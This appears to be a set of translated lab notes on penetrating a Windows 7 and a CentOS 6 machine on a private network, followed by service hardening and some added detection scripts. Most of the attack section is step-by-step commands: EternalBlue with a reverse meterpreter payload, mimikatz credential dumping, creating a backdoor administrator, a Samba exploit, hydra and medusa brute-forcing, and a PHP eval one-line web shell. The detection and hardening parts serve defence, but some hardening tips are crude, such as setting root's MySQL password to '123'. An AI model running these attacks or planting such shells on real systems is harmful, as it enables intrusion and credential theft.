1, Penetrating Windows 7
1. Preparing the environment
Attacking machine: one Kali, IP 192.168.191.153
Targets: one Windows 7, IP 192.168.191.130; one CentOS 6, IP 192.168.191.167
2, Boot the Kali attacking machine.
3, First scan with nmap, then analyze the scan results; if port 445 is open, attack 445 first.
nmap command: nmap -sV -T5 -n 192.168.191.130
Results shown:
1, Operating system: Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2, Open ports: 80, 135, 139, 445, 1801, 2103, 2107, 49152, 49153, 49154, 49155, 49156, 49157, 49158.
4. Now attack port 445. Open Metasploit in Kali with the msfconsole command (type msfconsole in the terminal).
If you do not know the module path, search for it: search ms17_010
Then run: use exploit/windows/smb/ms17_010_eternalblue # use the MS17-010 exploit module
set RHOST 192.168.191.130 # set the target host IP
set payload windows/x64/meterpreter/reverse_tcp # set the payload
# if the tcp payload does not work, use one of the following payloads instead
#set payload windows/x64/meterpreter/reverse_http
#set payload windows/x64/meterpreter/reverse_https
#set payload windows/x64/meterpreter/reverse_ftp
set LHOST 192.168.191.153 # set the local host IP
show options # view the current settings
exploit # launch the attack
Once the attack succeeds, run: load mimikatz
Then run: wdigest
A user 000 with password 111 is found.
Then exit. Command: ctrl + c
After exiting, run: run getgui -e telnet # opens 3389
Open a new terminal and run: rdesktop <target ip>
--------------------
If wdigest shows no users, create one.
Next, create a user
First enter a shell
Create a user: net user username password /add
net localgroup Administrators username /add
Because the target does not have that record, adding the user to the Administrators group failed.
Successful
Then in a newly opened terminal run: rdesktop <target ip>
Penetration is complete; you can do whatever you want.
Windows 7 and 2008 use exploit/windows/smb/ms17_010_eternalblue
Other versions use exploit/windows/smb/ms08_067_netapi
2, Penetrating Linux
1. Preparing the environment
Attacking machine: one Kali, IP 192.168.191.153
Targets: one Windows 7, IP 192.168.191.1; one CentOS 6, IP 192.168.191.167
2, Boot the Kali attacking machine.
3, First scan with nmap, then analyze the scan results; if port 445 is open, attack 445 first.
nmap command: nmap -sV -T5 -n 192.168.191.167
Results shown:
1, Operating system: Unix, Linux
2, Open ports: 21, 22, 23, 80, 139, 445, 3306.
4. Now attack port 445. Open Metasploit in Kali with the msfconsole command (type msfconsole in the terminal).
If you do not know the module path, search for it: search is_known
Then run: use exploit/linux/samba/is_known_pipename
set RHOST 192.168.191.167 # set the target host IP
show options # view the current settings
exploit # launch the attack
Once a shell is returned, you can do as you please in the Linux terminal.
2, SSH, port 22
If you do not know the module path, search for it: search ssh_login
1, Then run: use auxiliary/scanner/ssh/ssh_login
set rhost 192.168.191.168 # set the target host IP
set USERNAME root # set the user name (or set USERPASS_FILE <dictionary>)
set PASS_FILE <password dictionary> # (or set PASSWORD <password>)
show options # view the current settings
exploit # launch the attack
2, hydra -l root -P /root/123.txt 192.168.191.167 ssh
3, medusa -h 192.168.191.167 -u root -P /root/123.txt -M ssh
3, Telnet, port 23 # by default the root user cannot log in over telnet
If you do not know the module path, search for it: search telnet_login
1, Then run: use auxiliary/scanner/telnet/telnet_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME admin # set the user name (or set USERPASS_FILE <dictionary>)
set PASS_FILE <password dictionary> # (or set PASSWORD <password>)
show options # view the current settings
exploit # launch the attack
2, hydra -l admin -P /root/123.txt 192.168.191.167 telnet
3, medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet
4, FTP, port 21
If you do not know the module path, search for it: search ftp_login
1, Then run: use auxiliary/scanner/ftp/ftp_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME admin # set the user name (or set USERPASS_FILE <dictionary>)
set PASS_FILE <password dictionary> # (or set PASSWORD <password>)
show options # view the current settings
exploit # launch the attack
2, hydra -l admin -P /root/123.txt 192.168.191.167 ftp
3, medusa -h 192.168.191.167 -u admin -P /root/123.txt -M ftp
5, MySQL, port 3306
If you do not know the module path, search for it: search mysql_login
1, Then run: use auxiliary/scanner/mysql/mysql_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME root # set the user name (or set USERPASS_FILE <dictionary>)
set PASS_FILE <password dictionary> # (or set PASSWORD <password>)
show options # view the current settings
exploit # launch the attack
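Seen from the CentOS 6 side, every ssh_login, hydra or medusa run above leaves a burst of "Failed password" lines in /var/log/secure. The following is an added example, not part of the original notes: it counts failures per source address over a few constructed log lines and singles out the address whose guessing later succeeded. The sample lines, the threshold of 5 and the log format are assumptions.

```shell
#!/bin/bash
# Constructed sample of CentOS 6 /var/log/secure lines (not captured from any real host):
# a burst of failed root logins from one address, as a dictionary attack over SSH produces,
# one unrelated failure, then one success from the attacking address.
SAMPLE_LOG='Mar  3 10:01:02 centos6 sshd[2001]: Failed password for root from 192.168.191.153 port 40001 ssh2
Mar  3 10:01:02 centos6 sshd[2002]: Failed password for root from 192.168.191.153 port 40002 ssh2
Mar  3 10:01:03 centos6 sshd[2003]: Failed password for invalid user admin from 192.168.191.153 port 40003 ssh2
Mar  3 10:01:03 centos6 sshd[2004]: Failed password for root from 192.168.191.153 port 40004 ssh2
Mar  3 10:01:04 centos6 sshd[2005]: Failed password for root from 192.168.191.153 port 40005 ssh2
Mar  3 10:05:00 centos6 sshd[2010]: Failed password for lynn from 192.168.191.20 port 50001 ssh2
Mar  3 10:06:00 centos6 sshd[2011]: Accepted password for root from 192.168.191.153 port 40006 ssh2'

# Reads log lines on stdin; prints "<failures> <source ip>" per address, most failures first.
failed_by_ip() {
    grep -E 'sshd\[[0-9]+\]: Failed password for' \
        | sed -E 's/.* from ([0-9.]+) port .*/\1/' \
        | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Reads log lines on stdin; prints addresses with at least $1 failures (default 5).
flag_bruteforce() {
    failed_by_ip | awk -v t="${1:-5}" '$1 >= t {print $2}'
}

# Reads log lines on stdin; prints flagged addresses that afterwards also got an
# "Accepted password", i.e. a guess that worked. That is the case to escalate, not just block.
success_after_failures() {
    log=$(cat)
    for ip in $(printf '%s\n' "$log" | flag_bruteforce "$1"); do
        if printf '%s\n' "$log" | grep -qE "Accepted password for .* from ${ip} port"; then
            echo "$ip"
        fi
    done
    return 0
}

echo "addresses with 5 or more failed logins:"
printf '%s\n' "$SAMPLE_LOG" | flag_bruteforce 5
echo "of those, addresses that later logged in successfully:"
printf '%s\n' "$SAMPLE_LOG" | success_after_failures 5
```

On a live host, replace the sample with `cat /var/log/secure | flag_bruteforce 5`.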
--------------------
6, HTTP and MySQL statements for viewing files
One-line trojan: <?php @eval($_GET["123"]); ?>
1.php?123=system("cat /");
Command-line equivalent: cat /
MySQL: select load_file("/");
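The one-liner above executes whatever arrives in its GET parameter, so on the defending side there are two things to look for: PHP files that hand request input straight to eval/system, and access-log requests carrying that parameter. This added example (not from the original notes) does both over a constructed webroot and constructed Apache log lines; the file names, the parameter name and the client addresses are assumptions.

```shell
#!/bin/bash
# Constructed fixtures (not from the notes or any real host): a webroot holding one
# one-line shell of the kind shown above plus a benign page, and Apache access-log lines,
# two of which drive the shell through its GET parameter.
TMP=$(mktemp -d)
mkdir -p "$TMP/www"
printf '%s\n' '<?php @eval($_GET["123"]); ?>' > "$TMP/www/1.php"
printf '%s\n' '<?php echo "hello"; ?>' > "$TMP/www/index.php"
cat > "$TMP/access.log" <<'EOF'
192.168.191.20 - - [03/Mar/2019:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 12
192.168.191.153 - - [03/Mar/2019:10:00:05 +0800] "GET /1.php?123=system(%22id%22); HTTP/1.1" 200 40
192.168.191.153 - - [03/Mar/2019:10:00:09 +0800] "GET /1.php?123=system(%22cat%20/%22); HTTP/1.1" 200 512
EOF

# PHP files under $1 that feed request input straight into eval/assert/system and friends.
find_oneliners() {
    grep -rlE '(eval|assert|system|passthru|shell_exec|exec)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)\[' \
        --include='*.php' "$1"
}

# The request parameter a found shell reads, e.g. 123 for $_GET["123"].
shell_param() {
    sed -nE 's/.*\$_(GET|POST|REQUEST|COOKIE)\[[^A-Za-z0-9_]*([A-Za-z0-9_]+).*/\2/p' "$1" | head -1
}

# Access-log lines ($1) requesting script $2 with parameter $3, and the distinct client addresses.
shell_requests() {
    grep -E "\"(GET|POST) /$2\?(.*&)?$3=" "$1"
}
shell_clients() {
    shell_requests "$@" | awk '{print $1}' | sort -u
}

for f in $(find_oneliners "$TMP/www"); do
    p=$(shell_param "$f")
    echo "$f takes code from request parameter '$p'; clients that used it:"
    shell_clients "$TMP/access.log" "$(basename "$f")" "$p"
done
```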
3, Hardening all the services except Windows 445 and Linux 445; I do not know how to write the HTTP hardening.
1, FTP
vim /etc/vsftpd/vsftpd.conf
Disable remote logins: change every YES in the configuration file to NO.
service vsftpd reload
2, SSH
passwd root
Change the root password and delete ordinary users
vim /etc/passwd
Change: lynn:x:500:500::/home/lynn:/bin/bash
To: lynn:x:500:500::/home/lynn:/sbin/nologin
Deleting the line outright also works.
3, Telnet
telnet
vim /etc/passwd
Delete ordinary users
4, MySQL
Change the password or disable remote access to the MySQL server
To disable remote access, edit the MySQL configuration file: /etc/mysql/my.cnf
Under [mysqld] add the line: bind-address = 127.0.0.1 # binds MySQL to the local address, so only this machine can connect
Change the password:
use mysql;
set password for root@localhost = password('123');
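To confirm that the CentOS 6 steps above actually took effect, the following added example (not from the original notes) audits the three files they touch: ordinary accounts in /etc/passwd that still have a login shell, vsftpd.conf keys still set to YES, and the bind-address under [mysqld]. It runs on constructed copies of those files; the uid 500 cut-off and the fixture contents are assumptions.

```shell
#!/bin/bash
# Constructed fixtures standing in for /etc/passwd, /etc/vsftpd/vsftpd.conf and
# /etc/mysql/my.cnf (not copied from any real host). Every check takes a file path,
# so the same functions can be pointed at the real files after the hardening steps.
TMP=$(mktemp -d)
cat > "$TMP/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
lynn:x:500:500::/home/lynn:/bin/bash
EOF
cat > "$TMP/vsftpd.conf" <<'EOF'
anonymous_enable=YES
local_enable=YES
write_enable=NO
EOF
cat > "$TMP/my.cnf" <<'EOF'
[client]
port=3306
[mysqld]
bind-address = 127.0.0.1
EOF

# Ordinary accounts (uid >= 500 on CentOS 6) that still have a login shell; the notes switch
# these to /sbin/nologin or delete the line. System accounts below uid 500 are skipped.
interactive_users() {
    awk -F: '$3 >= 500 && $7 !~ /(nologin|false)$/ {print $1}' "$1"
}

# vsftpd keys still set to YES; the notes change every YES to NO.
vsftpd_yes_settings() {
    grep -E '^[[:space:]]*[a-z_]+[[:space:]]*=[[:space:]]*YES[[:space:]]*$' "$1" | sed -E 's/[[:space:]]*=.*//'
}

# bind-address under [mysqld]; no output means MySQL listens on every interface.
mysql_bind_address() {
    awk '/^\[/ {m = ($0 == "[mysqld]")}
         m && /^[[:space:]]*bind-address[[:space:]]*=/ {sub(/.*=[[:space:]]*/, ""); print; exit}' "$1"
}

# Run all three checks (args: passwd vsftpd.conf my.cnf); one FINDING line per problem.
audit() {
    for u in $(interactive_users "$1"); do echo "FINDING: $u still has a login shell"; done
    for k in $(vsftpd_yes_settings "$2"); do echo "FINDING: vsftpd $k=YES"; done
    ba=$(mysql_bind_address "$3")
    [ "$ba" = "127.0.0.1" ] || echo "FINDING: mysql bind-address is '${ba:-unset}'"
}

audit "$TMP/passwd" "$TMP/vsftpd.conf" "$TMP/my.cnf"
```

Against the fixtures this reports lynn's shell and the two vsftpd YES keys; the mysql bind is already correct.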